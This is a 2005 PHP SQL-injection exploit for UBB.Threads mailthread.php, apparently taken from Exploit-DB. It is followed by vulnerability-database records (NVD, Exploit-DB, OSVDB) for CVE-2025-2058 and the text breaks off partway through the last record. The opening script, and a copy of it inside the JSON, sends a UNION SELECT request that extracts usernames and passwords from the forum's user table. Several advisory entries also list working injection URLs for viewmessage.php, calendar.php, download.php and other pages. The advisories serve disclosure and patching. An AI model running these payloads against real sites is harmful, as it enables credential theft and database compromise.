<?php
#############################################################################
# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m
#############################################################################
# Vulnerable: UBBCentral SQL Injection
#
# Exploit By : MH_p0rtal
#
# Discovered By: James Bercegay
#############################################################################
# Gr33tz To ==> Alpha_programmer , Oil_karchack , The_CephaleX , Str0ke
#
# And Iranian Hacking & Security Teams :
# IHS TeaM , alphaST , Shabgard Security Team , Emperor Hacking Team ,
# Crouz Security Team & Simorgh-ev Security Team
#############################################################################
# ___________Config :
# please replace your address :
$url = "http:///www.example.com";
# please replace your dir address :
$dirs = "/dir/to/ubbt/";
# __________End Config
#############################################################################
$aa = strlen ( $dirs );
$ab = $aa - 1;
$ac = 0;
if (( $dirs[$ab] == "/" ) && ( $dirs[$ac] == "/" )) {
$merg = $dirs.mailthread.php;
$fc = fsockopen("$url", 80, $errno, $errstr, 30);
if (!$fc) {
echo "Can't Connect\n";
} else {
$mh = "GET $merg?Cat=0&Board=UBB2&Number=-99'%20UNION%20SELECT%20U_Username,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&page=0&vc=1&fpart=1&what=showflat HTTP/1.1\r\n";
$mh .= "Host: $url\r\n";
$mh .= "Connection: Close\r\n\r\n";
fwrite($fc, $mh);
while (!feof($fc)) {
echo fgets($fc, 1024);
}
fclose($fc);
}
} else {
echo " Your pattern doesn't equal with Exploit directory pattern ";
}
?>
# milw0rm.com [2005-06-25]
{"id": "EDB-ID:1069", "hash": "6afbdd735c6d1421d891b327afde8442", "type": "exploitdb", "bulletinFamily": "exploit", "title": "UBB Threads < 6.5.2 Beta mailthread.php SQL Injection Exploit", "description": "UBB Threads < 6.5.2 Beta (mailthread.php) SQL Injection Exploit. CVE-2005-2058. Webapps exploit for php platform", "published": "2005-06-25T00:00:00", "modified": "2005-06-25T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/1069/", "reporter": "mh_p0rtal", "references": [], "cvelist": ["CVE-2005-2058"], "lastseen": "2016-01-31T13:29:18", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2016-01-31T13:29:18"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-2058"]}, {"type": "osvdb", "idList": ["OSVDB:17527", "OSVDB:17531", "OSVDB:17525", "OSVDB:17530", "OSVDB:17532", "OSVDB:17528", "OSVDB:17533", "OSVDB:17526", "OSVDB:17529"]}, {"type": "exploitdb", "idList": ["EDB-ID:25900", "EDB-ID:25898", "EDB-ID:25897", "EDB-ID:25902", "EDB-ID:25901", "EDB-ID:25899"]}, {"type": "nessus", "idList": ["UBBTHREADS_PRINTTHREAD_SQL_INJECTION.NASL"]}], "modified": "2016-01-31T13:29:18"}, "vulnersScore": 7.8}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/1069/", "sourceData": "<?php\r\n#############################################################################\r\n# T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m\r\n#############################################################################\r\n# Vulnerable: UBBCentral SQL Injection\r\n#\r\n# Exploit By : MH_p0rtal\r\n#\r\n# Discovered By: James Bercegay\r\n#############################################################################\r\n# Gr33tz To ==> Alpha_programmer , Oil_karchack , The_CephaleX , Str0ke\r\n#\r\n# And Iranian Hacking & Security Teams :\r\n# IHS TeaM , alphaST , Shabgard Security Team , Emperor Hacking Team ,\r\n# Crouz Security Team & Simorgh-ev Security Team\r\n#############################################################################\r\n# ___________Config :\r\n# please replace your address :\r\n$url = \"http:///www.example.com\";\r\n# please replace your dir address :\r\n$dirs = \"/dir/to/ubbt/\";\r\n# __________End Config\r\n#############################################################################\r\n$aa = strlen ( $dirs );\r\n$ab = $aa - 1;\r\n$ac = 0;\r\nif (( $dirs[$ab] == \"/\" ) && ( $dirs[$ac] == \"/\" )) {\r\n$merg = $dirs.mailthread.php;\r\n$fc = fsockopen(\"$url\", 80, $errno, $errstr, 30);\r\nif (!$fc) {\r\n\r\necho \"Can't Connect\\n\";\r\n} else {\r\n $mh = \"GET $merg?Cat=0&Board=UBB2&Number=-99'%20UNION%20SELECT%20U_Username,U_Password%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'victim'/*&page=0&vc=1&fpart=1&what=showflat HTTP/1.1\\r\\n\";\r\n $mh .= \"Host: $url\\r\\n\";\r\n $mh .= \"Connection: Close\\r\\n\\r\\n\";\r\n\r\n fwrite($fc, $mh);\r\n while (!feof($fc)) {\r\n echo fgets($fc, 1024);\r\n }\r\n fclose($fc);\r\n}\r\n} else {\r\necho \" Your pattern doesn't equal with Exploit directory pattern \";\r\n}\r\n?>\n\n# milw0rm.com [2005-06-25]\n", "osvdbidlist": ["17528"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:08:14", "bulletinFamily": "NVD", "description": "Multiple SQL injection vulnerabilities in Infopop UBB.Threads before 6.5.2 Beta allow remote attackers to execute arbitrary SQL commands via the Number parameter to (1) download.php, (2) modifypost.php, (3) mailthread.php, or (4) notifymod.php, (5) month or (6) year parameter to calendar.php, (7) message parameter to viewmessage.php, (8) main parameter to addfav.php, or (9) posted parameter to grabnext.php.", "modified": "2016-10-18T03:24:00", "id": "CVE-2005-2058", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2058", "published": "2005-06-29T04:00:00", "title": "CVE-2005-2058", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T02:24:48", "bulletinFamily": "exploit", "description": "UBBCentral UBB.threads 5.5.1/6.x modifypost.php Number Parameter SQL Injection. CVE-2005-2058. Webapps exploit for php platform", "modified": "2005-06-24T00:00:00", "published": "2005-06-24T00:00:00", "id": "EDB-ID:25899", "href": "https://www.exploit-db.com/exploits/25899/", "type": "exploitdb", "title": "UBBCentral UBB.threads 5.5.1/6.x modifypost.php Number Parameter SQL Injection", "sourceData": "source: http://www.securityfocus.com/bid/14052/info\r\n \r\nUBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.\r\n \r\nA successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.\r\n\r\nhttp://www.example.com/ubbt/modifypost.phpCat=0&Username=foobar&Number=[SQL]&Board=UBB8&page=0&what=showflat&fpart=&vc=1&Approved=yes&convert=markup&Subject=Re%3A+Pruning+old+posts&Icon=book.gif&Body=yup&markedit=1&addsig=1&preview=1&peditdelete=Delete+this+post ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25899/"}, {"lastseen": "2016-02-03T02:24:56", "bulletinFamily": "exploit", "description": "UBBCentral UBB.threads 5.5.1/6.x viewmessage.php message Parameter SQL Injection. CVE-2005-2058. Webapps exploit for php platform", "modified": "2005-06-24T00:00:00", "published": "2005-06-24T00:00:00", "id": "EDB-ID:25900", "href": "https://www.exploit-db.com/exploits/25900/", "type": "exploitdb", "title": "UBBCentral UBB.threads 5.5.1/6.x viewmessage.php message Parameter SQL Injection", "sourceData": "source: http://www.securityfocus.com/bid/14052/info\r\n \r\nUBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.\r\n \r\nA successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.\r\n\r\nhttp://www.example.com/ubbt/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,0,0%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'foobar'/*&status=N&box=received ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25900/"}, {"lastseen": "2016-02-03T02:25:13", "bulletinFamily": "exploit", "description": "UBBCentral UBB.threads 5.5.1/6.x notifymod.php Number Parameter SQL Injection. CVE-2005-2058. Webapps exploit for php platform", "modified": "2005-06-24T00:00:00", "published": "2005-06-24T00:00:00", "id": "EDB-ID:25902", "href": "https://www.exploit-db.com/exploits/25902/", "type": "exploitdb", "title": "UBBCentral UBB.threads 5.5.1/6.x notifymod.php Number Parameter SQL Injection", "sourceData": "source: http://www.securityfocus.com/bid/14052/info\r\n \r\nUBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.\r\n \r\nA successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.\r\n\r\nhttp://www.example.com/ubbt/notifymod.php?Cat=0&Board=UBB5&Number=42173[SQL]&page=0&what=showthreaded ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25902/"}, {"lastseen": "2016-02-03T02:24:39", "bulletinFamily": "exploit", "description": "UBBCentral UBB.threads 5.5.1/6.x calendar.php Multiple Parameter SQL Injection. CVE-2005-2058. Webapps exploit for php platform", "modified": "2005-06-24T00:00:00", "published": "2005-06-24T00:00:00", "id": "EDB-ID:25898", "href": "https://www.exploit-db.com/exploits/25898/", "type": "exploitdb", "title": "UBBCentral UBB.threads 5.5.1/6.x calendar.php Multiple Parameter SQL Injection", "sourceData": "source: http://www.securityfocus.com/bid/14052/info\r\n \r\nUBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.\r\n \r\nA successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.\r\n\r\nhttp://www.example.com/ubbt/calendar.php?Cat=7&month=6&year=2005[SQL]\r\nhttp://www.example.com/ubbt/calendar.php?Cat=&month=7[SQL]&year=2005 ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25898/"}, {"lastseen": "2016-02-03T02:24:30", "bulletinFamily": "exploit", "description": "UBBCentral UBB.threads 5.5.1/6.x download.php Number Parameter SQL Injection. CVE-2005-2058. Webapps exploit for php platform", "modified": "2005-06-24T00:00:00", "published": "2005-06-24T00:00:00", "id": "EDB-ID:25897", "href": "https://www.exploit-db.com/exploits/25897/", "type": "exploitdb", "title": "UBBCentral UBB.threads 5.5.1/6.x download.php Number Parameter SQL Injection", "sourceData": "source: http://www.securityfocus.com/bid/14052/info\r\n\r\nUBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.\r\n\r\nA successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. \r\n\r\nhttp://www.example.com/ubbt/download.php?Number=42227[SQL] ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25897/"}, {"lastseen": "2016-02-03T02:25:04", "bulletinFamily": "exploit", "description": "UBBCentral UBB.threads 5.5.1/6.x addfav.php main Parameter SQL Injection. CVE-2005-2058. Webapps exploit for php platform", "modified": "2005-06-24T00:00:00", "published": "2005-06-24T00:00:00", "id": "EDB-ID:25901", "href": "https://www.exploit-db.com/exploits/25901/", "type": "exploitdb", "title": "UBBCentral UBB.threads 5.5.1/6.x addfav.php main Parameter SQL Injection", "sourceData": "source: http://www.securityfocus.com/bid/14052/info\r\n \r\nUBB.Threads is prone to multiple SQL injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.\r\n \r\nA successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.\r\n\r\nhttp://www.example.com/ubbt/addfav.php?Cat=0&Board=UBB2&main=41654[SQL]&type=reminder&Number=41654&page=0&vc=1&fpart=1&what=showflat ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25901/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:13", "bulletinFamily": "software", "description": "## Vulnerability Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'viewmessage.php' script not properly sanitizing user-supplied input to the 'message' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 6.5.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'viewmessage.php' script not properly sanitizing user-supplied input to the 'message' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[victim]/viewmessage.php?Cat=&message=-99%20UNION%20SELECT%20null,U_Username,U_Password,0,0%20FROM%20w3t_Users%20WHERE%20U_Username%20=%20'foobar'/*&status=N&box=received\n## References:\nVendor URL: http://www.ubbcentral.com/ubbthreads/\nVendor Specific Solution URL: http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351\nSecurity Tracker: 1014285\n[Secunia Advisory ID:15805](https://secuniaresearch.flexerasoftware.com/advisories/15805/)\n[Related OSVDB ID: 17517](https://vulners.com/osvdb/OSVDB:17517)\n[Related OSVDB ID: 17530](https://vulners.com/osvdb/OSVDB:17530)\n[Related OSVDB ID: 17533](https://vulners.com/osvdb/OSVDB:17533)\n[Related OSVDB ID: 17518](https://vulners.com/osvdb/OSVDB:17518)\n[Related OSVDB ID: 17521](https://vulners.com/osvdb/OSVDB:17521)\n[Related OSVDB ID: 17527](https://vulners.com/osvdb/OSVDB:17527)\n[Related OSVDB ID: 17512](https://vulners.com/osvdb/OSVDB:17512)\n[Related OSVDB ID: 17525](https://vulners.com/osvdb/OSVDB:17525)\n[Related OSVDB ID: 17526](https://vulners.com/osvdb/OSVDB:17526)\n[Related OSVDB ID: 17528](https://vulners.com/osvdb/OSVDB:17528)\n[Related OSVDB ID: 17531](https://vulners.com/osvdb/OSVDB:17531)\n[Related OSVDB ID: 17532](https://vulners.com/osvdb/OSVDB:17532)\n[Related OSVDB ID: 17534](https://vulners.com/osvdb/OSVDB:17534)\nOther Advisory URL: http://www.gulftech.org/?node=research&article_id=00084-06232005\nOther Advisory URL: http://www.cyberlords.net/advisories/cl_ubb.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0213.html\nISS X-Force ID: 21124\n[CVE-2005-2058](https://vulners.com/cve/CVE-2005-2058)\nBugtraq ID: 14052\n", "modified": "2005-06-23T05:15:28", "published": "2005-06-23T05:15:28", "href": "https://vulners.com/osvdb/OSVDB:17529", "id": "OSVDB:17529", "title": "UBB.threads viewmessage.php message Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:13", "bulletinFamily": "software", "description": "## Vulnerability Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'modifypost.php' script not properly sanitizing user-supplied input to the 'Number' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 6.5.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'modifypost.php' script not properly sanitizing user-supplied input to the 'Number' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[victim]/modifypost.phpCat=0&Username=foobar&Number=[SQL]&Board=UBB8&page=0&what=showflat&fpart=&vc=1&Approved=yes&convert=markup\n&Subject=Re%3A+Pruning+old+posts&Icon=book.gif&Body=yup&markedit=1&addsig=1&preview=1&peditdelete=Delete+this+post\n## References:\nVendor URL: http://www.ubbcentral.com/ubbthreads/\nVendor Specific Solution URL: http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351\nSecurity Tracker: 1014285\n[Secunia Advisory ID:15805](https://secuniaresearch.flexerasoftware.com/advisories/15805/)\n[Related OSVDB ID: 17517](https://vulners.com/osvdb/OSVDB:17517)\n[Related OSVDB ID: 17530](https://vulners.com/osvdb/OSVDB:17530)\n[Related OSVDB ID: 17533](https://vulners.com/osvdb/OSVDB:17533)\n[Related OSVDB ID: 17518](https://vulners.com/osvdb/OSVDB:17518)\n[Related OSVDB ID: 17521](https://vulners.com/osvdb/OSVDB:17521)\n[Related OSVDB ID: 17512](https://vulners.com/osvdb/OSVDB:17512)\n[Related OSVDB ID: 17525](https://vulners.com/osvdb/OSVDB:17525)\n[Related OSVDB ID: 17526](https://vulners.com/osvdb/OSVDB:17526)\n[Related OSVDB ID: 17528](https://vulners.com/osvdb/OSVDB:17528)\n[Related OSVDB ID: 17529](https://vulners.com/osvdb/OSVDB:17529)\n[Related OSVDB ID: 17531](https://vulners.com/osvdb/OSVDB:17531)\n[Related OSVDB ID: 17532](https://vulners.com/osvdb/OSVDB:17532)\n[Related OSVDB ID: 17534](https://vulners.com/osvdb/OSVDB:17534)\nOther Advisory URL: http://www.gulftech.org/?node=research&article_id=00084-06232005\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0213.html\nISS X-Force ID: 21124\n[CVE-2005-2058](https://vulners.com/cve/CVE-2005-2058)\nBugtraq ID: 14052\n", "modified": "2005-06-23T05:15:28", "published": "2005-06-23T05:15:28", "href": "https://vulners.com/osvdb/OSVDB:17527", "id": "OSVDB:17527", "title": "UBB.threads modifypost.php Number Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:13", "bulletinFamily": "software", "description": "## Vulnerability Description\nUBB.threads contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'download.php' script not properly sanitizing user-supplied input to the 'Number' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 6.5.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nUBB.threads contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the 'download.php' script not properly sanitizing user-supplied input to the 'Number' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[victim]/download.php?Number=42227[SQL]\n## References:\nVendor URL: http://www.ubbcentral.com/ubbthreads/\nVendor Specific Solution URL: http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351\nSecurity Tracker: 1014285\n[Secunia Advisory ID:15805](https://secuniaresearch.flexerasoftware.com/advisories/15805/)\n[Related OSVDB ID: 17517](https://vulners.com/osvdb/OSVDB:17517)\n[Related OSVDB ID: 17530](https://vulners.com/osvdb/OSVDB:17530)\n[Related OSVDB ID: 17533](https://vulners.com/osvdb/OSVDB:17533)\n[Related OSVDB ID: 17518](https://vulners.com/osvdb/OSVDB:17518)\n[Related OSVDB ID: 17521](https://vulners.com/osvdb/OSVDB:17521)\n[Related OSVDB ID: 17527](https://vulners.com/osvdb/OSVDB:17527)\n[Related OSVDB ID: 17512](https://vulners.com/osvdb/OSVDB:17512)\n[Related OSVDB ID: 17526](https://vulners.com/osvdb/OSVDB:17526)\n[Related OSVDB ID: 17528](https://vulners.com/osvdb/OSVDB:17528)\n[Related OSVDB ID: 17529](https://vulners.com/osvdb/OSVDB:17529)\n[Related OSVDB ID: 17531](https://vulners.com/osvdb/OSVDB:17531)\n[Related OSVDB ID: 17532](https://vulners.com/osvdb/OSVDB:17532)\n[Related OSVDB ID: 17534](https://vulners.com/osvdb/OSVDB:17534)\nOther Advisory URL: http://www.gulftech.org/?node=research&article_id=00084-06232005\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0213.html\nISS X-Force ID: 21124\nFrSIRT Advisory: ADV-2005-0875\n[CVE-2005-2058](https://vulners.com/cve/CVE-2005-2058)\nBugtraq ID: 14052\n", "modified": "2005-06-23T05:15:28", "published": "2005-06-23T05:15:28", "href": "https://vulners.com/osvdb/OSVDB:17525", "id": "OSVDB:17525", "title": "UBB.threads download.php Number Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:13", "bulletinFamily": "software", "description": "## Vulnerability Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'notifymod.php' script not properly sanitizing user-supplied input to the 'Number' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 6.5.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'notifymod.php' script not properly sanitizing user-supplied input to the 'Number' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[victim]/notifymod.php?Cat=0&Board=UBB5&Number=42173[SQL]&page=0&what=showthreaded\n## References:\nVendor URL: http://www.ubbcentral.com/ubbthreads/\nVendor Specific Solution URL: http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351\nSecurity Tracker: 1014285\n[Secunia Advisory ID:15805](https://secuniaresearch.flexerasoftware.com/advisories/15805/)\n[Related OSVDB ID: 17517](https://vulners.com/osvdb/OSVDB:17517)\n[Related OSVDB ID: 17530](https://vulners.com/osvdb/OSVDB:17530)\n[Related OSVDB ID: 17533](https://vulners.com/osvdb/OSVDB:17533)\n[Related OSVDB ID: 17518](https://vulners.com/osvdb/OSVDB:17518)\n[Related OSVDB ID: 17521](https://vulners.com/osvdb/OSVDB:17521)\n[Related OSVDB ID: 17527](https://vulners.com/osvdb/OSVDB:17527)\n[Related OSVDB ID: 17512](https://vulners.com/osvdb/OSVDB:17512)\n[Related OSVDB ID: 17525](https://vulners.com/osvdb/OSVDB:17525)\n[Related OSVDB ID: 17526](https://vulners.com/osvdb/OSVDB:17526)\n[Related OSVDB ID: 17528](https://vulners.com/osvdb/OSVDB:17528)\n[Related OSVDB ID: 17529](https://vulners.com/osvdb/OSVDB:17529)\n[Related OSVDB ID: 17532](https://vulners.com/osvdb/OSVDB:17532)\n[Related OSVDB ID: 17534](https://vulners.com/osvdb/OSVDB:17534)\nOther Advisory URL: http://www.gulftech.org/?node=research&article_id=00084-06232005\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0213.html\nISS X-Force ID: 21124\n[CVE-2005-2058](https://vulners.com/cve/CVE-2005-2058)\nBugtraq ID: 14052\n", "modified": "2005-06-23T05:15:28", "published": "2005-06-23T05:15:28", "href": "https://vulners.com/osvdb/OSVDB:17531", "id": "OSVDB:17531", "title": "UBB.threads notifymod.php Number Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:13", "bulletinFamily": "software", "description": "## Vulnerability Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'addfav.php' script not properly sanitizing user-supplied input to the 'main' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 6.5.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'addfav.php' script not properly sanitizing user-supplied input to the 'main' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing Notes\nhttp://[victim]/addfav.php?Cat=0&Board=UBB2&main=41654[SQL]&type=reminder&Number=41654&page=0&vc=1&fpart=1&what=showflat\n## References:\nVendor URL: http://www.ubbcentral.com/ubbthreads/\nVendor Specific Solution URL: http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351\nSecurity Tracker: 1014285\n[Secunia Advisory ID:15805](https://secuniaresearch.flexerasoftware.com/advisories/15805/)\n[Related OSVDB ID: 17517](https://vulners.com/osvdb/OSVDB:17517)\n[Related OSVDB ID: 17533](https://vulners.com/osvdb/OSVDB:17533)\n[Related OSVDB ID: 17518](https://vulners.com/osvdb/OSVDB:17518)\n[Related OSVDB ID: 17521](https://vulners.com/osvdb/OSVDB:17521)\n[Related OSVDB ID: 17527](https://vulners.com/osvdb/OSVDB:17527)\n[Related OSVDB ID: 17512](https://vulners.com/osvdb/OSVDB:17512)\n[Related OSVDB ID: 17525](https://vulners.com/osvdb/OSVDB:17525)\n[Related OSVDB ID: 17526](https://vulners.com/osvdb/OSVDB:17526)\n[Related OSVDB ID: 17528](https://vulners.com/osvdb/OSVDB:17528)\n[Related OSVDB ID: 17529](https://vulners.com/osvdb/OSVDB:17529)\n[Related OSVDB ID: 17531](https://vulners.com/osvdb/OSVDB:17531)\n[Related OSVDB ID: 17532](https://vulners.com/osvdb/OSVDB:17532)\n[Related OSVDB ID: 17534](https://vulners.com/osvdb/OSVDB:17534)\nOther Advisory URL: http://www.gulftech.org/?node=research&article_id=00084-06232005\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0213.html\nISS X-Force ID: 21124\n[CVE-2005-2058](https://vulners.com/cve/CVE-2005-2058)\nBugtraq ID: 14052\n", "modified": "2005-06-23T05:15:28", "published": "2005-06-23T05:15:28", "href": "https://vulners.com/osvdb/OSVDB:17530", "id": "OSVDB:17530", "title": "UBB.threads addfav.php main Variable SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:13", "bulletinFamily": "software", "description": "## Vulnerability Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'Rating System' not properly sanitizing user-supplied input to the 'Main' parameter. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 6.5.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'Rating System' not properly sanitizing user-supplied input to the 'Main' parameter. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## References:\nVendor URL: http://www.ubbcentral.com/ubbthreads/\nVendor Specific Solution URL: http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/42351/Main/42351/#Post42351\nSecurity Tracker: 1014285\n[Secunia Advisory ID:15805](https://secuniaresearch.flexerasoftware.com/advisories/15805/)\n[Related OSVDB ID: 17517](https://vulners.com/osvdb/OSVDB:17517)\n[Related OSVDB ID: 17530](https://vulners.com/osvdb/OSVDB:17530)\n[Related OSVDB ID: 17518](https://vulners.com/osvdb/OSVDB:17518)\n[Related OSVDB ID: 17521](https://vulners.com/osvdb/OSVDB:17521)\n[Related OSVDB ID: 17527](https://vulners.com/osvdb/OSVDB:17527)\n[Related OSVDB ID: 17512](https://vulners.com/osvdb/OSVDB:17512)\n[Related OSVDB ID: 17525](https://vulners.com/osvdb/OSVDB:17525)\n[Related OSVDB ID: 17526](https://vulners.com/osvdb/OSVDB:17526)\n[Related OSVDB ID: 17528](https://vulners.com/osvdb/OSVDB:17528)\n[Related OSVDB ID: 17529](https://vulners.com/osvdb/OSVDB:17529)\n[Related OSVDB ID: 17531](https://vulners.com/osvdb/OSVDB:17531)\n[Related OSVDB ID: 17532](https://vulners.com/osvdb/OSVDB:17532)\n[Related OSVDB ID: 17534](https://vulners.com/osvdb/OSVDB:17534)\nOther Advisory URL: http://www.gulftech.org/?node=research&article_id=00084-06232005\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-06/0213.html\nISS X-Force ID: 21124\n[CVE-2005-2058](https://vulners.com/cve/CVE-2005-2058)\nBugtraq ID: 14052\n", "modified": "2005-06-23T05:15:28", "published": "2005-06-23T05:15:28", "href": "https://vulners.com/osvdb/OSVDB:17533", "id": "OSVDB:17533", "title": "UBB.threads Rating System Main Parameter SQL Injection", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:13", "bulletinFamily": "software", "description": "## Vulnerability Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'grabnext.php' script not properly sanitizing user-supplied input to the 'posted' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Solution Description\nUpgrade to version 6.5.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nUBB.threads contains a flaw that may allow a remote attacker to carry out an SQL injection attack. The issue is due to the 'grabnext.php' script not properly sanitizing user-supplied input to the 'posted' variable. This may allow a remote attacker to inject or manipulate SQL queries in the backend database.\n## Manual Testing 